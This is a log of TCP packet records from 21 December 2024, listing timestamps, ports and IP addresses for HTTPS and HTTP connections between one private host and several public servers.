Dec 21, 2024 21:04:49.652021885 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.652439117 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.652440071 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.652638912 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.652822018 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.652869940 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.653117895 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.653208971 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.653400898 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.653644085 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.653656960 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.653995991 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.654186964 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.654398918 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.654407978 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.654680014 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.654895067 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.654895067 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.654906988 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.655293941 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.655507088 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.655519962 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.655678988 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.655941963 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.655950069 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.656084061 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.656258106 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.656467915 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.656467915 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.656480074 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.656932116 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.656932116 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.657131910 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.657315016 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.657555103 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.657612085 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.657701969 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.657893896 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.658144951 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.658190012 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.658354044 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.658695936 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.658709049 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.658818960 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.659198999 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.659248114 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.659363031 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.659554958 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.659790039 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.659820080 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.659984112 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.660178900 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.660403013 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.660450935 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.660672903 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.660746098 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.660947084 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.661217928 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.661415100 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.661415100 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.661637068 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.661700010 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.661891937 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.662085056 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.662374020 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.662374020 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.662758112 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.662765026 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.662806034 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.663149118 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.663239956 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.663433075 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.663672924 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.663753986 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.664011955 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.664222002 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.664418936 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.664429903 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.664450884 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.664597988 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.664833069 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.665142059 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.665142059 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.665317059 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.665508032 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.665508032 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.665518999 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.665605068 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.665816069 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.666007996 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.666065931 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.666281939 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.666327953 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.666501999 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.666830063 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.667021990 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.667213917 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.667311907 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.667707920 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.667754889 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.668222904 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.768914938 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.768928051 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.769114971 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.769124985 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.769164085 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.769426107 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.774159908 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.774171114 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.774244070 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:49.774363041 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.774543047 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.774715900 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:49.775890112 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:05:21.608506918 CET	49750	443	192.168.11.20	204.79.197.237
Dec 21, 2024 21:05:23.074644089 CET	49751	80	192.168.11.20	199.232.214.172
Dec 21, 2024 21:05:23.074646950 CET	49752	80	192.168.11.20	172.217.165.195
Dec 21, 2024 21:05:23.074733973 CET	49753	80	192.168.11.20	199.232.214.172
Dec 21, 2024 21:05:23.204191923 CET	80	49752	172.217.165.195	192.168.11.20
Dec 21, 2024 21:05:23.204387903 CET	49752	80	192.168.11.20	172.217.165.195
Dec 21, 2024 21:05:23.215745926 CET	80	49751	199.232.214.172	192.168.11.20
Dec 21, 2024 21:05:23.215758085 CET	80	49751	199.232.214.172	192.168.11.20
Dec 21, 2024 21:05:23.215981960 CET	49751	80	192.168.11.20	199.232.214.172
Dec 21, 2024 21:05:23.216305017 CET	80	49753	199.232.214.172	192.168.11.20
Dec 21, 2024 21:05:23.216876030 CET	80	49753	199.232.214.172	192.168.11.20
Dec 21, 2024 21:05:23.217039108 CET	49753	80	192.168.11.20	199.232.214.172
Dec 21, 2024 21:06:20.988734961 CET	49756	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:20.988755941 CET	443	49756	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:20.988930941 CET	49756	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:20.989538908 CET	49756	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:20.989552021 CET	443	49756	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:21.264782906 CET	443	49756	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:21.265074968 CET	49756	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:21.266169071 CET	49756	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:21.266186953 CET	443	49756	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:21.266521931 CET	443	49756	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:21.289589882 CET	49756	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:21.289591074 CET	49756	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:21.289673090 CET	443	49756	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:22.231849909 CET	443	49756	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:22.231911898 CET	443	49756	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:22.232091904 CET	49756	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:22.233937979 CET	49756	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:22.233937979 CET	49756	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:22.233953953 CET	443	49756	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:22.233958006 CET	443	49756	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:22.239398956 CET	49757	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:22.239419937 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:22.239700079 CET	49757	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:22.239872932 CET	49757	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:22.239885092 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:23.516367912 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:23.516539097 CET	49757	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:23.517424107 CET	49757	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:23.517438889 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:23.517787933 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:23.519464970 CET	49757	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:23.519464970 CET	49757	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:23.519536972 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:23.812733889 CET	443	49749	204.79.197.237	192.168.11.20
Dec 21, 2024 21:06:24.218233109 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:24.218260050 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:24.218538046 CET	49757	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:24.218550920 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:24.218687057 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:24.218708038 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:24.218750000 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:24.218940020 CET	49757	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:24.218952894 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:24.219000101 CET	49757	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:24.219461918 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:24.219482899 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:24.219680071 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:24.220098972 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:24.220120907 CET	49757	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:24.220120907 CET	49757	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:24.220129013 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:24.220258951 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:24.220319033 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:24.220376015 CET	49757	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:24.220550060 CET	49757	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:24.220639944 CET	49757	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:24.220639944 CET	49757	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:24.220654964 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:24.220659018 CET	443	49757	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:27.499064922 CET	49761	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:27.499094009 CET	443	49761	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:27.499438047 CET	49761	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:27.499588013 CET	49761	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:27.499603033 CET	443	49761	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:27.978024960 CET	443	49761	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:27.978527069 CET	49761	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:27.978539944 CET	443	49761	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:27.979787111 CET	443	49761	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:27.980001926 CET	49761	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:27.986601114 CET	49761	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:27.986726046 CET	443	49761	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:27.987202883 CET	49762	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:27.987235069 CET	443	49762	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:27.987375021 CET	49762	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:27.987389088 CET	49763	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:27.987413883 CET	443	49763	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:27.987565041 CET	49764	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:27.987585068 CET	443	49764	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:27.987603903 CET	49761	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:27.987612963 CET	443	49761	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:27.987613916 CET	49763	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:27.987710953 CET	49764	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:27.988173962 CET	49762	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:27.988187075 CET	443	49762	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:27.988535881 CET	49763	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:27.988550901 CET	443	49763	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:27.988862991 CET	49764	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:27.988874912 CET	443	49764	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.030029058 CET	49761	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.274966002 CET	443	49761	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.275015116 CET	443	49761	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.275269985 CET	49761	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.275280952 CET	443	49761	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.276599884 CET	443	49761	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.276622057 CET	443	49761	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.276810884 CET	443	49761	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.276876926 CET	49761	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.276890039 CET	443	49761	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.276981115 CET	49761	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.286104918 CET	443	49761	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.286360979 CET	49761	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.286374092 CET	443	49761	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.326787949 CET	49761	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.326798916 CET	443	49761	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.327151060 CET	49761	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.327228069 CET	443	49761	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.327353954 CET	443	49761	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.327383995 CET	49761	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.327461004 CET	49761	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.463458061 CET	443	49763	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.463793993 CET	49763	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.463810921 CET	443	49763	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.464487076 CET	443	49764	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.464572906 CET	443	49762	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.464626074 CET	443	49763	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.464780092 CET	49764	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.464797020 CET	443	49764	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.464916945 CET	49762	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.464929104 CET	443	49762	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.465070009 CET	49763	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.465152979 CET	49763	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.465204954 CET	443	49763	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.466104984 CET	443	49764	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.466315985 CET	49764	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.466368914 CET	443	49762	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.466541052 CET	49764	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.466541052 CET	49762	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.466588974 CET	49764	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.466654062 CET	443	49764	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.466799974 CET	49762	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.466928959 CET	443	49762	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.508513927 CET	49763	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.508513927 CET	49762	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.508532047 CET	443	49762	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.509474993 CET	49764	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.509493113 CET	443	49764	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:28.558096886 CET	49762	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:28.560786963 CET	49764	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:29.228883982 CET	443	49764	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.228954077 CET	443	49764	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.229127884 CET	49764	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:29.229518890 CET	49764	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:29.229541063 CET	443	49764	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.230215073 CET	49762	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:29.232292891 CET	443	49763	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.232431889 CET	443	49763	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.232594967 CET	49763	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:29.232831001 CET	49763	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:29.232847929 CET	443	49763	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.244013071 CET	49765	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:29.244038105 CET	443	49765	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.244204998 CET	49765	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:29.244539022 CET	49765	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:29.244555950 CET	443	49765	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.278237104 CET	443	49762	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.374336004 CET	443	49762	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.374357939 CET	443	49762	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.374488115 CET	443	49762	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.374527931 CET	443	49762	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.374727964 CET	49762	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:29.374727964 CET	49762	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:29.374887943 CET	49762	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:29.374897003 CET	443	49762	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.720551968 CET	443	49765	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.720906019 CET	49765	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:29.720918894 CET	443	49765	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.721299887 CET	443	49765	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.721719980 CET	49765	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:29.721806049 CET	49765	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:29.721824884 CET	443	49765	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.772236109 CET	49765	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:29.998970985 CET	443	49765	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.999036074 CET	443	49765	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.999083042 CET	443	49765	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.999136925 CET	443	49765	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:29.999248981 CET	49765	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:29.999248981 CET	49765	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:29.999520063 CET	49765	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:29.999535084 CET	443	49765	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:31.294425964 CET	49767	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:31.294450045 CET	443	49767	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:31.294641972 CET	49767	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:31.295001984 CET	49767	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:31.295013905 CET	443	49767	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:31.773251057 CET	443	49767	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:31.773605108 CET	49767	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:31.773612022 CET	443	49767	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:31.774100065 CET	443	49767	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:31.775105000 CET	49767	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:31.775233984 CET	443	49767	172.217.15.196	192.168.11.20
Dec 21, 2024 21:06:31.826630116 CET	49767	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:32.260301113 CET	49770	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:32.260330915 CET	443	49770	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:32.260520935 CET	49770	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:32.260716915 CET	49770	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:32.260735035 CET	443	49770	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:32.527373075 CET	443	49770	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:32.527623892 CET	49770	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:32.528508902 CET	49770	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:32.528522968 CET	443	49770	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:32.528845072 CET	443	49770	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:32.529823065 CET	49770	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:32.529882908 CET	49770	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:32.529928923 CET	443	49770	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:33.260211945 CET	443	49770	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:33.260292053 CET	443	49770	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:33.260497093 CET	49770	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:33.260641098 CET	49770	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:33.260653973 CET	443	49770	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:33.390069962 CET	49771	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:33.390094995 CET	443	49771	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:33.390269995 CET	49771	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:33.390423059 CET	49771	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:33.390434027 CET	443	49771	104.21.96.1	192.168.11.20
